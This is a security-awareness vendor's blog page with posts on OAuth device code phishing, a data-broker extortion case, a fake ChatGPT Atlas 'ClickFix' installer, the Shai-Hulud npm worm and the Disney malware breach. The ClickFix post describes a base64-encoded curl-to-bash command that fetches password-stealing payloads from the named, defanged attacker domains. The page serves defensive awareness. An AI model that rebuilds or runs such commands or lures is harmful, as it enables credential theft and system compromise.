Meet the Fable team at FS-ISAC 2026 Americas Spring Summit
Book time
Sign in
Book demo
Sign in
Book a demo

Category: Emerging threats

Beware Microsoft 365 secure authentication requests

Posted on by A. Stryker

The TL;DR

  • Attackers use OAuth “device code” phishing to trick victims into approving unauthorized access to their real Microsoft accounts.
  • The attack uses a real Microsoft login page as victims “re-authorize” their session… but approve the attacker’s session, instead.
  • Attackers can then do and see everything the victim is allowed to do and see—leading to sensitive mailbox access, proprietary data theft, and business email compromise.
  • Urge your people to never approve logins they didn’t personally ask for!
  • Scroll down for a free, 2-minute Fable video briefing you can use

Threat actors can bypass passwords and multi-factor authentication (MFA) controls to access Microsoft 365 accounts for future attacks through the popular OAuth “device code” phishing technique.

Instead of stealing credentials, OAuth device code phishing lures trick their victims into approving attackers’ access using legitimate Microsoft login pages.

For this lure, there’s no bad grammar or strange URLs your employees can spot: just an urgent and unexpected “reauthorization” request that innocently displays the real login page… 

… granting an unseen threat actor’s access to the victim’s Microsoft 365 account for as long as the victim doesn’t need to log in again.

Here’s how OAuth device code phishing lures generally work 

  1. Attackers send a phishing message asking someone to enter a short code – a one time password (OTP) – in a real Microsoft-based URL, because they need to “reauthenticate” their current session.
    1. Some attacks, for example, used the legitimate login page of microsoft.com/devicelogin
  2. Instead of the OTP being used for their personal session, victims are actually authorizing the attacker’s access.
    1. The system is only supposed to grant these tokens after an employee puts in their username, password, or other credentials to guarantee the user’s identity and authorization. 
    2. However, attackers manipulate the  system so the victim re-approves the attacker’s session instead of their own. The system then assumes this second session also used the victim’s credentials.
  3. The attacker can then access the person’s Microsoft account–including email, contacts, and proprietary business information–until the reauthorized session token expires.
    1. Remember: the system thinks that attackers are actually the authorized user, since they have a “real” session token. So, the attacker can look at and do anything the victim is allowed to see or do!

Security researchers have been noting a rise in these campaigns since their initial appearance during the COVID-19 pandemic in 2020-2021 and ramping up in late 2025:

2020-2021: Researchers first see the modern OAuth device code phishing lure used in “high-profile [business email compromise] BEC incidents” in “sophisticated phishing campaigns,” often using COVID-related messages to increase legitimacy and urgency. (Sophos)

Microsoft device login page used in an OAuth phishing attack / Secureworks

February 2025: Microsoft discusses how attackers targeted specific employees with text message lures (“smishing”) over Signal, WhatsApp, and Telegram messaging platforms to encourage victims to authorize the attacker’s session on Microsoft 365 accounts. (Microsoft)

An example of an early “smishing” lure and social engineering attempt used as part of a targeted OAuth attack / Microsoft).
An early example of an OTP used as part of an OAuth phishing attack / Microsoft

May 2025: Researchers continue to demonstrate the wide range of OAuth device code phishing attacks available, including setting up proofs of concept (PoCs) of how the attack technically works across lure formats. (Logpoint)

A researcher’s demonstration of how Microsoft redirects to a legitimate-appearing permissions request of an “unverified” application, as part of an OAuth device code phishing lure attack / Logpoint

November 2025: Cloud security researchers see more OAuth device code bypass attempts in their own security product across their customer base–with 98 suspicious successful authentication attempts, six malicious device registrations, and 7 Windows registration after device code authentications in the last three months. (Wiz)

December 2025: Email security researchers detail rising use of the OAuth device code phishing lure by both nation-state and financially motivated threat actors, now that low-code / no-code versions of the attack are now for sale on the dark web. One phishing email used a fake document about fake bonuses and benefits to encourage victims to click. (Proofpoint)

A phishing email used to trick victims into triggering the OTP for an OAuth session token theft / Proofpoint)
A phishing lure landing page, redirecting victims to a legitimate Microsoft authentication page so the victim can use the real OTP to authenticate the attacker’s session / Proofpoint

How to prevent initial access via OAuth device code phishing lures

In an OAuth attack, there’s no fake login page or obvious red flags you can train your teams to watch for: just a convincingly urgent request to “re-authorize” or “secure” their account. 

That’s why awareness and timing matter! Employees should never enter a device code unless they personally tried to login moments before, and they should treat any unexpected code requests as phishing.

How Fable can help you right now

Here’s a super-short and free downloadable video showing exactly how this attack works, and how employees can watch out for it. We designed this briefing specifically to help anyone recognize this threat before it turns into a real incident. 

Download it, share it, and remind your team: Don’t approve logins you didn’t ask for!

Watch the briefing

And download for your own use below.

Download now

If you’d like risk-based briefings and nudges that are hyper-targeted and customized to your organization, try the Fable platform.

Here’s our awkward breach playbook

Posted on by Jamie Barnett
The TL;DR

  • OK, deep breath
  • The Mixpanel breach included some Pornhub user data
  • Cybercriminal group ShinyHunters attempted to extort Pornhub
  • This is a reminder that companies don’t need to be breached directly to be at risk
  • We included some advice for employees in this free, downloadable, 2-min. video
  • Security should also stay alert for signs that internal users may be being extorted

Ok. Deep breath as we head into the holidays.

There’s no great way to say this, but there was a recent extortion attempt of Mixpanel involving some Pornhub data attackers got in a breach. Beyond all the embarrassing fallout, it’s a reminder that companies don’t need to be directly hacked for sensitive data to end up in the wrong hands.

Here’s what went down: A hacking group known as Scattered Lapsus$ Hunters exploited a breach at Mixpanel, a widely used analytics provider, to access user data from multiple organizations, including Pornhub, OpenAI, and others. It’s a growing pattern in modern attacks: adversaries go after shared tools and services, then use the data they find to pressure or impersonate downstream targets.

For people, the risk isn’t abstract. Exposed information can include email addresses, locations, and detailed activity logs (in this case, the particular video someone watched—ai ai ai!). That data can be used to craft convincing phishing messages, impersonate trusted services, or attempt extortion by referencing private behavior. For organizations, the impact extends beyond the initial breach. Once attackers have this context, they often target employees directly, hoping urgency or embarrassment will prompt a quick response.

What should security teams do? First off, small actions make a big difference. Through your human risk program, warn people to keep an eye out for unexpected emails, especially those that reference account activity, subscriptions, or alleged security issues. They should pause before responding to unusual requests and verify them through official channels. They should never reuse passwords across sites, update impacted passwords, and enable strong multi-factor authentication. Also, they should try to decouple private behavior from identifying information as much as possible. At work, they should enable multi-factor authentication wherever possible. And if they become the victim of an extortion attempt by a bad actor claiming to have access to sensitive data, they should escalate the issue to the security team. 

Beyond messaging to employees, security teams should stay alert for signs that internal users may be under pressure. Extortion attempts don’t always show up as external attacks—they can manifest as unusual behavior from otherwise trusted employees. Sudden requests for access, attempts to bypass controls, rushed approvals, or deviations from normal workflows can all be indicators that someone is being coerced. This isn’t about suspicion or blame, but recognizing that attackers increasingly target people directly, and ensuring there are clear, safe paths for employees to ask for help before a bad situation escalates.

To make this easier, Fable has created a short, 2-minute video that security teams can share internally to raise awareness about this type of third-party breach and the follow-on risks that come with it. It’s designed to be clear, practical, and non-alarmist, helping employees recognize what’s happening and what to do next. You can download and share the video for free below—and take a simple step toward reducing human risk before attackers have a chance to exploit it.

Download briefing video

How a fake ChatGPT installer tried to steal my password

Posted on by Kaushik Devireddy

The TL;DR

  • Over the holiday, I happened upon a fake ChatGPT Atlas site
  • The site’s instructions led me to password-stealing malware—a ClickFix attack!
  • The attack bypasses all the good endpoint protections
  • It’s a perfect storm: site cloning, trusted hosting, obfuscated commands, and privilege escalation
  • Scroll down for a free video to warn your team about this type of attack

Over the Thanksgiving holiday, I embarked on a small project to evaluate AI browsers, including the buzzy ChatGPT Atlas. Like most people, I clicked the first result I saw: a sponsored link. The page looked nearly identical to the real Atlas site: same layout, design, copy. The only subtle giveaway was the domain: a Google Sites URL. That’s increasingly common in modern phishing kits—tools like v0.dev make it trivial to clone a legitimate site in minutes, and hosting on Google Sites adds a false sense of credibility for anyone who thinks Google = trustworthy. Given our work here at Fable, I was pretty excited to have stumbled on this, and decided to give it a whirl and see just how much damage I could cause. 

Instead of getting a standard installer (.dmg), the fake site asked me to paste a command into Terminal. (By the way, this is the point where most people—especially curious or rushed users—might comply. And that’s exactly what attackers count on.) The command itself looked cryptic but harmless: a base64-encoded string passed into curl and executed with bash. But it got nefarious pretty quickly: it decoded to a remote script hosted at https://tenkmo[dot]com/gdrive, a domain controlled by the attacker.

The downloaded script repeatedly prompted for my macOS password until the correct one was entered. Here’s the script:

Once captured, it used that password to run a second-stage payload from https://shrimpfc[dot]com/drive/update with elevated privileges (sudo). That payload—which VirusTotal confirms is malicious—was then free to do whatever it wanted.

Mystery solved! It’s a variation of an attack we’ve seen before: ClickFix. Notably, neither CrowdStrike nor SentinelOne flagged it on download. This is becoming more common: social engineering plus user-granted execution can bypass even strong endpoint defenses.

This should go without saying, but do not try this at home! This attack is a textbook example of how modern phishing blends AI-generated site cloning, trusted hosting platforms, obfuscated commands, and privilege escalation—all without a single traditional “phishing email.” It also illustrates a critical truth: users don’t need to fall for an email spoof anymore; simply searching for something and clicking the wrong sponsored link can lead to compromise.

We’ve created a short, practical briefing video on ClickFix that you can download for free and share with your team. It walks through why you should never run command-line instructions provided by a website, how attackers disguise malicious installers, and how to verify software safely.

Use the button below to download this briefing, and share it with your team. 

Download now

Don’t ignore Shai-Hulud

Posted on by Sanny Liao

The TL;DR

The Shai-Hulud malware campaign has quickly become one of the most disruptive npm supply chain events to date. Attackers compromised maintainer accounts and published malicious versions of legitimate npm packages seeded with credential-stealing malware. This means one compromised update can infect lots of organizations.

The worm malware steals sensitive credentials, including GitHub, npm, cloud, and CI credentials, by harvesting tokens from environment variables, local config files, and secrets exposed during CI builds. If it doesn’t find valuable credentials, it may try to delete local files. The attack can also derail development pipelines by injecting malicious GitHub Actions workflows designed to persist and steal more secrets.

Your developers are your first, and most affected, line of defense. Reduce exposure by briefing them about Shai-Hulud (and supply chain attacks generally), and urging them to validate updates before installing third-party software, use known-safe versions, and rotate potentially exposed credentials. Also, train them to disable automated install scripts where possible, and encourage them to flag unexpected prompts or behavior immediately.

To make it easy to brief your development teams, we produced a super-crisp, role-appropriate, personalized training video that explains Shai-Hulud in plain language and outlines the steps to take to safely navigate the threat. It’s available now inside your Fable platform and as a free download. It’s a fast, actionable way to alert your team about this and other supply chain threats.

Watch the briefing

And download for your own use below.

Download now

If you’d like risk-based briefings and nudges that are hyper-targeted and customized to your organization, try the Fable platform.

Malware, not magic: lessons from the Disney breach

Posted on by Fable Security

The TL;DR

  • A Disney employee downloaded an AI tool that secretly contained malware
  • Attackers used stolen credentials to access internal systems and leak 1TB of data
  • Learn how the breach unfolded and what your employees can do to prevent similar attacks
  • Scroll down for a free, 2-minute Fable video briefing you can use to protect your organization

In early 2024, we learned that no amount of pixie dust could protect the Magic Kingdom from being breached—even from preventable attacks. A Disney employee downloaded what appeared to be a harmless AI image-generation tool from GitHub. Hidden in the download was malware that captured the employee’s stored credentials and cookies.

The attacker used those credentials to log into Disney’s internal Slack system and download roughly 1.1 terabytes of data, including sensitive employee records, internal communications, and even customer data from the Disney Cruise Line. The attacker later published the stolen data online after making threats to the employee and the company.

The human factors behind the breach

Only the bare necessities were required for this breach to be successful because it wasn’t an advanced exploit; it simply took advantage of an employee’s insecure practices to pivot from a personal computer to the corporate network.

Here’s what went wrong:

  • Mixing work and personal use: corporate credentials were stored on a personal gaming computer.
  • Unapproved software downloads: the employee installed an unvetted app from an unverified source.
  • Weak credential hygiene: persistent sessions and stored passwords without MFA gave the attacker easy access.
  • Lack of verification: the employee didn’t realize the tool was malicious until it was too late.

It’s ironic but appropriate to note how the combination of these factors allowed the holes in the metaphorical slices of Swiss cheese to align. Addressing any one of these issues could have prevented the breach.

How to prevent attacks like this

Most breaches are the result of inadvertent human error. But if employees know what to do, they can be your first line of defense.

Encourage them to:

  • Keep work and personal data separate, and use caution when intermingling data on personal devices.
  • Use only approved tools—if it’s not on the list, don’t install it.
  • Use multi-factor authentication everywhere.
  • Avoid storing passwords or cookies on unmanaged devices.
  • Report suspicious downloads or messages immediately.

Organizations should also enforce strong endpoint protection, software vetting, and behavioral monitoring to catch risky actions early, before they become breaches.

How Fable Security can help

Below is a short, 2-minute video briefing you can share with your employees that explains what went wrong in the Disney breach and what simple steps your people can take today to prevent the same mistake. Click the “download now” button below to share it with your team right away.

Download now

Love this briefing video, and want to see more videos like this that are hyper-targeted and customized to your organization? Try the Fable platform today. Schedule a demo, and we’ll get you access.